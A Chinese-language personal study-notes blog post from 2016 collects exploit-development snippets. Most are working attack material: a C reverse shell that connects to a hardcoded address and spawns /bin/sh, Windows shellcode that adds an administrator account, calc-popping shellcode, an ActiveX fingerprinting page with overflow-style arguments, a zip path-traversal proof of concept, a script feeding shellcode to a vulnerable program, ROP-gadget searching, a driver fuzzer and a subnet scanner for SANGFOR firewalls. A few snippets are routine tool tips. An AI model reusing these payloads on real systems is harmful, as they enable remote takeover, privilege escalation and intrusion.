一点学习笔记

by Netfairy - 2016-12-11

【apt-get install安装软件问题(安装包的依赖库版本过高问题)】

apt-cache showpkg libqt4-dbus
aptitude install libqt4-dbus=4.4.3-1


【反连shell】

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc,rc;
struct sockaddr_in serv_addr;


int main()
{
	serv_addr.sin_family=AF_INET;
	serv_addr.sin_addr.s_addr=0x01cea8c0;  //ip转十六进制:http://www.osgeo.cn/app/sc126
	serv_addr.sin_port=0x7777;  //30583
	soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	rc=connect(soc,(struct sockaddr*)&serv_addr,0x10);
	dup2(soc,0);
	dup2(soc,1);
	dup2(soc,2);
	execve("/bin/sh",0,0);
}



【克隆指定版本仓库】

git clone -b v2.0.0 https://github.com/devttys0/binwalk.git


【添加用户shellcode Win7 XP可用 194 字节】

unsigned char shellcode[]="\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";

shellcode = unescape("%ud231%u30b2%u8b64%u8b12%u0c52%u528b%u8b1c%u0842%u728b%u8b20%u8012%u0c7e%u7533%u89f2%u03c7%u3c78%u578b%u0178%u8bc2%u207a%uc701%ued31%u348b%u01af%u45c6%u3e81%u6957%u456e%uf275%u7a8b%u0124%u66c7%u2c8b%u8b6f%u1c7a%uc701%u7c8b%ufcaf%uc701%u4b68%u6e33%u6801%u4220%u6f72%u2f68%u4441%u6844%u726f%u2073%u7468%u6172%u6874%u6e69%u7369%u2068%u6441%u686d%u6f72%u7075%u6368%u6c61%u6867%u2074%u6f6c%u2668%u6e20%u6865%u4444%u2620%u6e68%u2f20%u6841%u6f72%u334b%u3368%u206e%u6842%u7242%u4b6f%u7368%u7265%u6820%u7465%u7520%u2f68%u2063%u686e%u7865%u2065%u6368%u646d%u892e%ufee5%u534d%uc031%u5550%ud7ff");

31D2B230648B128B520C8B521C8B42088B72208B12807E0C3375F289C703783C8B577801C28B7A2001C731ED8B34AF01C645813E57696E4575F28B7A2401C7668B2C6F8B7A1C01C78B7CAFFC01C7684B336E01682042726F682F414444686F727320687472617468696E6973682041646D68726F75706863616C676874206C6F6826206E656844442026686E202F4168726F4B3368336E20426842726F4B68736572206865742075682F63206E686578652068636D642E89E5FE4D5331C05055FFD7
【弹计算器XP WIN7可用】


unsigned char shellcode[]="\xeb\x54\x31\xf6\x64\x8b\x76\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b\x36\x8b\x5d\x3c\x8b\x5c\x1d\x78\x85\xdb\x74\xf0\x01\xeb\x8b\x4b\x18\x67\xe3\xe8\x8b\x7b\x20\x01\xef\x8b\x7c\x8f\xfc\x01\xef\x31\xc0\x99\x02\x17\xc1\xca\x04\xae\x75\xf8\x3b\x54\x24\x04\xe0\xe4\x75\xca\x8b\x53\x24\x01\xea\x0f\xb7\x14\x4a\x8b\x7b\x1c\x01\xef\x03\x2c\x97\xc3\x68\xe7\xc4\xcc\x69\xe8\xa2\xff\xff\xff\x50\x68\x63\x61\x6c\x63\x8b\xd4\x40\x50\x52\xff\xd5\x68\x77\xa6\x60\x2a\xe8\x8b\xff\xff\xff\x50\xff\xd5";

shellcode = unescape("%u54eb%uf631%u8b64%u3076%u768b%u8b0c%u1c76%u6e8b%u8b08%u8b36%u3c5d%u5c8b%u781d%udb85%uf074%ueb01%u4b8b%u6718%ue8e3%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1702%ucac1%uae04%uf875%u543b%u0424%ue4e0%uca75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%uc397%ue768%uccc4%ue869%uffa2%uffff%u6850%u6163%u636c%ud48b%u5040%uff52%u68d5%ua677%u2a60%u8be8%uffff%u50ff%ud5ff");

EB5431F6648B76308B760C8B761C8B6E088B368B5D3C8B5C1D7885DB74F001EB8B4B1867E3E88B7B2001EF8B7C8FFC01EF31C0990217C1CA04AE75F83B542404E0E475CA8B532401EA0FB7144A8B7B1C01EF032C97C368E7C4CC69E8A2FFFFFF506863616C638BD4405052FFD56877A6602AE88BFFFFFF50FFD5

JS判断ActiveX控件和office版本


<html>
<body>

<object classid='clsid:8C4D012A-9B6C-4B87-A7CB-724BD7A9727C' id='target0' ></object>
<object classid='clsid:2CD1D011-1DC4-4EBC-B03E-67E3713DF5A3' id='target1' ></object>

<script >

    //
    try
    {
        arg0="18446744073709551627"
        arg1="AAAAAAAAAAAA"
        target0.writeFileWithName(arg0,arg1);
        alert("ebz_Printmade2_setup.exe install!") ; 
    }
    catch(e)
    {
        alert("ebz_Printmade2_setup.exe no install!") ; 
    }

    //
    try
    {
        arg0="AAAAA";
        arg1="IMC4";
        arg2="9223372036854775818";
        target1.convertTextToImage(arg0 ,arg1 ,arg2) ;
        alert("iBankSetup install!") ; 
    }
    catch(e)
    {
        alert("iBankSetup no install!") ; 
    }

    var checka = 0;
    var checkb = 0;
     try
    {
        checka = new ActiveXObject("SharePoint.OpenDocuments.4");
    } 
    catch (e) {}
                 
     try 
    {
        checkb = new ActiveXObject("SharePoint.OpenDocuments.3");
    }
    catch (e) {}

                 
    if ((typeof checka) == "object" && (typeof checkb) == "object") 
    {
        alert("Microsoft Office 2010");
        try
        {
            location.href='ms-help://'
        } 
        catch(e){}              
    }
    else if ((typeof checka) == "number" && (typeof checkb) == "object") 
    {
        alert("Microsoft Office 2007");
        try
        {
            location.href='ms-help://'
        } 
        catch(e){}    
    }
    else
    {
        alert("No support version!");
    }

  
</script></body></html>



【Fuzzing驱动的时候输出到内核调试器】

1.驱动
#include <ntddk.h>

PDEVICE_OBJECT pDevice_Object;  //设备对象
UNICODE_STRING devname;  //设备名称
UNICODE_STRING symname;  //符号名称
#define FILE_DEVICE_EXPLOIT_ME 0x00008888

#define IOCTL_1 (ULONG)CTL_CODE(FILE_DEVICE_EXPLOIT_ME,0x800,METHOD_NEITHER,FILE_WRITE_ACCESS)  //0x888a003



void DriverUnload(PDRIVER_OBJECT pDeviceObject)
{
	KdPrint(("驱动卸载成功\n"));
	IoDeleteSymbolicLink(&symname);  //删除符号链接
	IoDeleteDevice(pDevice_Object);  //删除设备链接
}


//IRP_MJ_CREATE处理函数
NTSTATUS CreateHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	//设置IRP状态
	pIrp->IoStatus.Status=STATUS_SUCCESS;
	//设置IRP操作字节数
	pIrp->IoStatus.Information=0;
	//完成IRP处理
	IoCompleteRequest(pIrp,IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}

//IRP_MJ_CLOSE处理函数
NTSTATUS CloseHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	//设置IRP状态
	pIrp->IoStatus.Status=STATUS_SUCCESS;
	//设置IRP操作字节数
	pIrp->IoStatus.Information=0;
	//完成IRP处理
	IoCompleteRequest(pIrp,IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}


//IRP_MJ_READ处理函数
NTSTATUS ReadHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	//设置IRP状态
	pIrp->IoStatus.Status=STATUS_SUCCESS;
	//设置IRP操作字节数
	pIrp->IoStatus.Information=0;
	//完成IRP处理
	IoCompleteRequest(pIrp,IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}

//IRP_MJ_WRITE处理函数
NTSTATUS WriteHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	//设置IRP状态
	pIrp->IoStatus.Status=STATUS_SUCCESS;
	//设置IRP操作字节数
	pIrp->IoStatus.Information=0;
	//完成IRP处理
	IoCompleteRequest(pIrp,IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}


//IRP_MJ_DEVICE_CONTROL处理函数
NTSTATUS ControlHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	PIO_STACK_LOCATION pIrpStackLocation; 
	ULONG ioControlCode;
	pIrpStackLocation=IoGetCurrentIrpStackLocation(pIrp);  //取得当前IO_STACK_LOCATION
	ioControlCode=pIrpStackLocation->Parameters.DeviceIoControl.IoControlCode;
	//根据不同的IoControlCode完成不同的功能
	switch(ioControlCode)
	{
	case IOCTL_1:
		DbgPrint("%s\n\n",pIrpStackLocation->Parameters.DeviceIoControl.Type3InputBuffer);
		break;
	default:
		DbgPrint("ERROR!");

	}

	//设置IRP状态
	pIrp->IoStatus.Status=STATUS_SUCCESS;
	//设置IRP操作字节数
	pIrp->IoStatus.Information=0;
	//完成IRP处理
	IoCompleteRequest(pIrp,IO_NO_INCREMENT);

	return STATUS_SUCCESS;

}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pUnicodeString)
{
	NTSTATUS status;
	pDriverObject->DriverUnload=DriverUnload;  //设置卸载例程
	RtlInitUnicodeString(&devname,L"\\Device\\Netfairy");
	RtlInitUnicodeString(&symname,L"\\DosDevices\\Netfairy");
	status=IoCreateDevice(pDriverObject,0,&devname,FILE_DEVICE_UNKNOWN,0,true,&pDevice_Object);  //创建一个新设备
	if(!NT_SUCCESS(status))
	{
		DbgPrint("创建设备失败\n");
		return status;

	}
	else
	{
		DbgPrint("创建设备成功\n");
	}
	status=IoCreateSymbolicLink(&symname,&devname);  //创建一个符号链接
	if(!NT_SUCCESS(status))
	{
		DbgPrint("创建符号失败\n");
		IoDeleteDevice(pDevice_Object);
		return status;

	}
	else
	{
		DbgPrint("创建符号成功\n");
	}
	//注册派遣函数
	pDriverObject->MajorFunction[IRP_MJ_CREATE]=CreateHandler;
	pDriverObject->MajorFunction[IRP_MJ_CLOSE]=CloseHandler;
	pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=ControlHandler;
	pDriverObject->MajorFunction[IRP_MJ_READ]=ReadHandler;
	pDriverObject->MajorFunction[IRP_MJ_WRITE]=WriteHandler;

	return STATUS_SUCCESS;
}

2.Fuzzing模块

#include<stdio.h>
#include<windows.h>
#include<time.h>

//产生长度为length的随机字符串  
char* genRandomString(int length)  
{  
    int flag, i;  
    char* string;  
    srand((unsigned) time(NULL ));  
    if ((string = (char*) malloc(length)) == NULL )  
    {  
        
        return NULL ;  
    }  
  
    for (i = 0; i < length - 1; i++)  
    {  
        flag = rand() % 3;  
        switch (flag)  
        {  
            case 0:  
                string[i] = 'A' + rand() % 26;  
                break;  
            case 1:  
                string[i] = 'a' + rand() % 26;  
                break;  
            case 2:  
                string[i] = '0' + rand() % 10;  
                break;  
            default:  
                string[i] = 'x';  
                break;  
        }  
    }  
    string[length - 1] = '\0';  
    return string;  
}  

int main()
{
	BOOL ret;
	DWORD retn;
	char str[1000];
	
	srand(time(NULL));//设置随机数种子

	HANDLE device=CreateFile("\\\\.\\bd0004",GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_SYSTEM,0);  
	HANDLE debug=CreateFile("\\\\.\\Netfairy",GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_SYSTEM,0);  
	
	if(device==INVALID_HANDLE_VALUE)
	{
		printf("打开设备失败\n");
		getchar();
		exit(1);
	}
	unsigned int Length=0;
	while(1)
	{
		Length=rand()%1000;
		strcpy(str,genRandomString(Length));
		DeviceIoControl(debug,0x8888a003,str,Length,NULL,0,&retn,NULL);  
		ret=DeviceIoControl(device,0x222000,str,Length,NULL,0,&retn,NULL); 
		if(!ret)
		{
			printf("send failed\n");
		
		}
		else
		{
			printf("send success\n");
		}
	}
	
	getchar();
	return 0;
}

【Office2010 hxds rop】

rop.zip

【XP msvcrt mshtml rop】

msvcrt.zip

mshtml.zip


1.html加载2.html

//1.html
<html>
<body>
<script type="text/javascript">
	window.open("2.html");
	window.open('2.html');
</script>
</body>
</html>

//2.html
<html>
<head ></head>
<script>		
		window.opener=null;window.open('','_self');window.close();  //无提示关闭自己		
</script>
<body></body>
</html>

【windbg布置】


所有这些workspace的信息都被保存在注册表中,注册表的路径是

HKEY_CURRENT_USER\Software\Microsoft\Windbg\Workspaces

style.zip


解决在此页上的activex控件和本页上的其他部分的交互可能不安全.你想允许这种交互吗

解决在此页上的activex控件和本页上的其他部分的交互可能不安全.你想允许这种交互吗.zip


【 结束进程并替换文件】

//By Netfairy
#include "stdafx.h"
#include <windows.h> 

int main(int argc, char *argv[]) 
{ 
	system("taskkill /f /im CAJSHost.exe");
	system("xcopy C:\\CAJSHost.exe \"C:\\Program Files\\TTKN\\CAJVD\"  /Y");
	
	return 0; 
}

【创建一个非法压缩包】


import zipfile, sys

zf = zipfile.ZipFile("evil.zip", "w")
zf.write("test.txt", "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt")
zf.close()
print "[+] Created evil.zip successfully [+]"


【调用控制台程序并传递参数】

import struct,os,subprocess

shellcode=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
 
vulnpgm="C:\\Users\\Netfairy\\Desktop\\tcping.exe"
           
subprocess.Popen([vulnpgm, shellcode], shell=False)

【搜索一些符合条件指令地址】


r @$t0 = 0x39d01000
r @$t1 = 0x3a080000


.while( @$t0<0x39f03000)
{
	.if (wo(@$t0) == 0xe4ff or wo(@$t0) == 0xc354 ) 
	{
		r @$t1 = 0x3a080000
		.while( @$t1<0x3a0a5000 )
		{
			.if ((poi(@$t1+0x10)) == 0x0 ) 
			{
				.if ( poi(@$t1+0x4) == (poi(@$t0) -0x24) )  
				{
					.printf "%x\n",@$t0;
					.printf "%x\n",@$t1;
					
					.break
				}
			}
			r @$t1=@$t1+1;
		}
	}
	r @$t0=@$t0+1;
}


【IDA修复符号表】


#coding:utf-8
from idaapi import *
import time

loadaddress = 0x10000  #固件加载地址
eaStart = 0x301e64 + loadaddress #符号表基址
eaEnd = 0x3293a4 + loadaddress #符号表结束地址

ea = eaStart
eaEnd = eaEnd
while ea < eaEnd:
	#循环遍历修复函数名
	offset=0
	MakeStr(Dword(ea-offset),BADADDR)   
	sName = GetString(Dword(ea-offset),-1,ASCSTR_C)  #获取函数名
	print sName  
	if sName:
		eaFunc = Dword(ea-offset+4)
		MakeName(eaFunc,sName)
		MakeCode(eaFunc)
		MakeFunction(eaFunc,BADADDR)
	ea=ea+16

【指纹识别】


import httplib  
import re
i=-1
while True:
	i=i+1
	if i ==256:
		break
	try:
		conn = httplib.HTTPConnection("192.168.29."+str(i),80,True,0.2)  
		conn.request("GET", "/")  
		r1 = conn.getresponse() 
		response =  r1.read()
		retn = re.search(r"SANGFOR AF",response)
		if retn:
			print "192.168.29."+str(i)
		conn.close()
	except:
		continue